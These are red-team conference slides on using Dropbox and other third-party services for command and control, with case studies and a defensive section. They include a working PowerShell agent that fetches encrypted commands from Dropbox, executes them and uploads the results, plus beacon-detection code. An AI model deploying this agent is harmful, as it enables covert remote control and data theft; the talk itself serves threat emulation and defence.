Hiding in Plain Sight: Dropbox Command and Control

Abusing 3rd-Party Services For Command And Control
Vince Trune
whoami
• Vince Trune - @Truneski
• Electronics Engineer from Jomo Kenyatta University of Agriculture and Technology.
• Red-Teamer and Freelance Penetration Tester.
• First time AfricaHackon conference presenter (be nice).
• More into Threat Emulation and Replication.
About
• This talk is about how attackers abuse trusted 3rd party services and file sharing services to your detriment and their profit.
Intro
• 3rd party services include social media sites like Twitter and Facebook.
• File sharing sites like Dropbox and Google Docs.
3rd Party Advantages
• Social media services are now a necessity for any marketing team, PR team and, by extension, the technical teams.
• File sharing sites are free, easy to use, extremely fast and can be used in conjunction with social media sites.
• Traffic to them is almost always whitelisted and unmonitored in most organizations.
Why Do This Talk
• Already being used by Advanced Persistent Threats (APTs) in the wild.
• Gives a technical edge to our Red-Team ops (offense fuels defense).
• More fun and a tremendous learning experience.
Advanced Persistent Threats
Attacker Infrastructure
• Paid cloud services: DigitalOcean, AWS, Azure, etc.
• Previously compromised infrastructure: hack people to hack other people.
• 3rd party services and file sharing sites.
• Techniques that bend traffic in "legitimate" ways.
Real World Case Studies
Dropbox: Operation BugDrop
• Targeted Ukraine on a grand scale.
• Prime motivation for the early release of Invoke-DBC2.
• Used Dropbox for data exfiltration and for storing C2 plugins.
GitHub: Winnti Group
• Uses GitHub for command & control.
• Financially motivated and engaged in active cyber-espionage.
• Mostly uses the PlugX RAT in its attacks.
Twitter: APT29
• Uses Twitter to control its malware (HAMMERTOSS).
• Steganographic images hosted on GitHub carry the instructions; stolen data goes out to cloud storage services.
• Probably Russian state-sponsored.
Current Tools
• GCat - shell over Gmail
• Empire 2.0 - supports custom C2 listener modules, including ones over 3rd party services
• DropSmack - C2 over the Dropbox sync folder
• Instegogram - C2 over Instagram with steganography
• DropboxC2 - C2 over Dropbox
• Invoke-DBC2 - C2 over PowerShell and Dropbox
Threat Emulation & Replication: My Approach
Adversary Emulation Features
• Uses the service's API for all interaction with the C2 channel.
• AES-128 for encryption of communications.
• PowerShell for the client-side (victim) code: runs in memory, is powerful and scales widely.
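The PowerShell below is an added illustration of those three features wired together; it is not code from Invoke-DBC2 or any of the tools listed earlier. It uses AES-128-CBC for the payload, the Dropbox HTTP API (`/2/files/upload` and `/2/files/download`) for every transport step, and an in-memory check-in routine. The access token, the `agent-01` ID, the `/dbc2/<agent>/tasks` and `/results` folder layout, the shared secret and all function names are placeholders chosen for the example.

```powershell
# Added example for this slide: not Invoke-DBC2 or any other tool's code.
# Token, agent ID, secret and folder layout are placeholders (assumptions).
$Token   = '<DROPBOX_ACCESS_TOKEN>'        # assumption: token of a Dropbox app you control
$AgentId = 'agent-01'                      # assumption: one folder per victim
$Secret  = 'pre-shared-secret-change-me'   # assumption: operator/agent shared secret

# Derive a 128-bit AES key from the shared secret (first 16 bytes of SHA-256).
function Get-AesKey([string]$Passphrase) {
    $sha  = [System.Security.Cryptography.SHA256]::Create()
    $hash = $sha.ComputeHash([Text.Encoding]::UTF8.GetBytes($Passphrase))
    return [byte[]]$hash[0..15]
}

# AES-128 in CBC mode with PKCS7 padding; a fresh random IV is prepended to the ciphertext.
function Protect-Message([string]$Plaintext, [byte[]]$Key) {
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.KeySize = 128; $aes.Key = $Key; $aes.GenerateIV()
    $pt = [Text.Encoding]::UTF8.GetBytes($Plaintext)
    $ct = $aes.CreateEncryptor().TransformFinalBlock($pt, 0, $pt.Length)
    return [byte[]]($aes.IV + $ct)
}

function Unprotect-Message([byte[]]$Blob, [byte[]]$Key) {
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.KeySize = 128; $aes.Key = $Key; $aes.IV = [byte[]]$Blob[0..15]
    $pt = $aes.CreateDecryptor().TransformFinalBlock($Blob, 16, $Blob.Length - 16)
    return [Text.Encoding]::UTF8.GetString($pt)
}

# All transport is the Dropbox HTTP API; the wire only ever sees dropboxapi.com.
function Send-DropboxFile([string]$Path, [byte[]]$Bytes) {
    $headers = @{
        Authorization     = "Bearer $Token"
        'Dropbox-API-Arg' = (@{ path = $Path; mode = 'overwrite'; mute = $true } | ConvertTo-Json -Compress)
    }
    Invoke-RestMethod -Method Post -Uri 'https://content.dropboxapi.com/2/files/upload' `
        -Headers $headers -ContentType 'application/octet-stream' -Body $Bytes | Out-Null
}

function Receive-DropboxFile([string]$Path) {
    $headers = @{
        Authorization     = "Bearer $Token"
        'Dropbox-API-Arg' = (@{ path = $Path } | ConvertTo-Json -Compress)
    }
    # The response body is binary, so .Content is a byte[]; nothing touches disk.
    $resp = Invoke-WebRequest -Method Post -Uri 'https://content.dropboxapi.com/2/files/download' `
        -Headers $headers -ContentType 'application/octet-stream' -UseBasicParsing
    return [byte[]]$resp.Content
}

# One beacon: pull tasking, decrypt, run it in-process, encrypt and push the result.
function Invoke-CheckIn {
    $key = Get-AesKey $Secret
    try   { $tasking = Receive-DropboxFile "/dbc2/$AgentId/tasks" }
    catch { return }   # no tasking file yet: Dropbox answers with an error, wait for the next beacon
    $command = Unprotect-Message $tasking $key
    $output  = Invoke-Expression $command 2>&1 | Out-String
    Send-DropboxFile "/dbc2/$AgentId/results" (Protect-Message $output $key)
}

# Offline self-check of the crypto layer (needs no token or network).
$k = Get-AesKey $Secret
if ((Unprotect-Message (Protect-Message 'whoami' $k) $k) -ne 'whoami') { throw 'AES round-trip failed' }

# Agent loop with a little jitter; the operator uses the same two Dropbox functions the other
# way round (upload encrypted tasking to /tasks, download and decrypt /results).
# while ($true) { Invoke-CheckIn; Start-Sleep -Seconds (55 + (Get-Random -Maximum 10)) }
```

Two caveats a practitioner should note. CBC with a random IV gives confidentiality only; anyone who recovers the shared secret can forge tasking, so anything beyond a demo should authenticate the blob (HMAC over IV and ciphertext, or AES-GCM). And the sleep with jitter is exactly the behaviour the timing analysis on the defence slides is built to catch.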
Limitations
• Hard to model and truly emulate the adversary's tactics and techniques.
• Requires considerable skill for a small Red Team.
• Our proofs of concept are easily defeated.
Demos
Defend The Land
• Invest in your security team.
• Endpoint based: binary signature heuristics (AV).
• Network baseline: timestamp analysis & beaconing
  • Establish a baseline for nodes in the environment.
• Network & process correlation & event logging
  • Should PowerShell be calling out to Twitter's API?
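A concrete version of the last two bullets, added here as an example and not part of the talk or its tooling: PowerShell that takes network-connection events of the kind Sysmon Event ID 3 produces (the `Time`, `Image`, `DestHost` and `DestPort` field names are assumptions modelled on it, and the sample events are constructed inline), flags image/destination pairs whose inter-connection timing is too regular to be a human, and lists processes talking to third-party APIs that are not the clients you expect to see there.

```powershell
# Added example: beacon timing and process/destination correlation over constructed
# network-connection events (field names are assumptions modelled on Sysmon Event ID 3).
$base   = Get-Date '2017-08-01T09:00:00'
$events = @()

# Constructed: a PowerShell process polling the Dropbox API every ~60 s with up to 2 s of jitter.
foreach ($i in 0..9) {
    $events += [pscustomobject]@{
        Time     = $base.AddSeconds(60 * $i + ($i % 3))
        Image    = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        DestHost = 'api.dropboxapi.com'; DestPort = 443
    }
}
# Constructed: a browser hitting the same API at human, irregular intervals.
foreach ($s in 0, 7, 130, 131, 400, 900, 905, 1700) {
    $events += [pscustomobject]@{
        Time     = $base.AddSeconds($s)
        Image    = 'C:\Program Files\Google\Chrome\Application\chrome.exe'
        DestHost = 'api.dropboxapi.com'; DestPort = 443
    }
}

# Beaconing: group by (process, destination) and measure how regular the gaps between
# connections are. A low coefficient of variation (stddev / mean) over enough connections
# is the signal; a human-driven client produces a high one.
function Get-BeaconCandidates([object[]]$Events, [int]$MinCount = 6, [double]$MaxCv = 0.2) {
    $Events | Group-Object Image, DestHost | ForEach-Object {
        $grp = $_
        if ($grp.Count -lt $MinCount) { return }
        $times = @($grp.Group | ForEach-Object { [datetime]$_.Time } | Sort-Object)
        $gaps  = @(1..($times.Count - 1) | ForEach-Object { ($times[$_] - $times[$_ - 1]).TotalSeconds })
        $mean  = ($gaps | Measure-Object -Average).Average
        if ($mean -le 0) { return }
        $var   = ($gaps | ForEach-Object { ($_ - $mean) * ($_ - $mean) } | Measure-Object -Sum).Sum / $gaps.Count
        $cv    = [math]::Sqrt($var) / $mean
        if ($cv -le $MaxCv) {
            [pscustomobject]@{
                Image = $grp.Group[0].Image; DestHost = $grp.Group[0].DestHost
                Connections = $grp.Count; MeanGapSec = [math]::Round($mean, 1); CV = [math]::Round($cv, 3)
            }
        }
    }
}

# Correlation: which processes talk to these services at all, and are they the expected clients?
function Get-UnexpectedApiCallers([object[]]$Events, [string[]]$WatchedHosts, [string[]]$ExpectedImages) {
    $Events |
        Where-Object { $WatchedHosts -contains $_.DestHost -and $ExpectedImages -notcontains (Split-Path $_.Image -Leaf) } |
        Group-Object Image, DestHost |
        ForEach-Object { [pscustomobject]@{ Image = $_.Group[0].Image; DestHost = $_.Group[0].DestHost; Connections = $_.Count } }
}

# Assumptions: the API hosts worth watching and the binaries allowed to talk to them in this environment.
$watched  = 'api.dropboxapi.com', 'content.dropboxapi.com', 'api.twitter.com', 'api.github.com'
$expected = 'chrome.exe', 'firefox.exe', 'msedge.exe', 'Dropbox.exe'

Get-BeaconCandidates -Events $events | Format-Table -AutoSize
Get-UnexpectedApiCallers -Events $events -WatchedHosts $watched -ExpectedImages $expected | Format-Table -AutoSize
```

On the constructed data the powershell.exe group is reported by both functions (near-constant 60 s gaps, and a process that has no business calling the Dropbox API), while the Chrome group passes both checks. In production the two inputs come from the endpoint network-connection events and proxy or NetFlow records on the data-sources slide; the baseline of expected images is the part that has to be built per environment.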
Data Sources to Consider
• Network
  • PCAP / SPAN off of core switch and egress
  • DNS logs or passive DNS
  • NetFlow
  • Proxy logs
  • Internal threat intel (sandbox detonation)
• Endpoint (eventing is best)
  • Process listing events
  • Network connection events
  • DNS lookup events
  • Service add/removal events
  • Program install / uninstall events
Conclusion
• APTs are creative and will find ways to use your weaknesses.
• 3rd party services make for quick and easy C2 or exfiltration vectors.
• Detecting the use of 3rd party services for C2 is difficult:
  • Requires foundational network collection.
  • Attacker activity will often come as a series of behaviors that form a pattern.
  • Need to look for anomalous activity.
References
Questions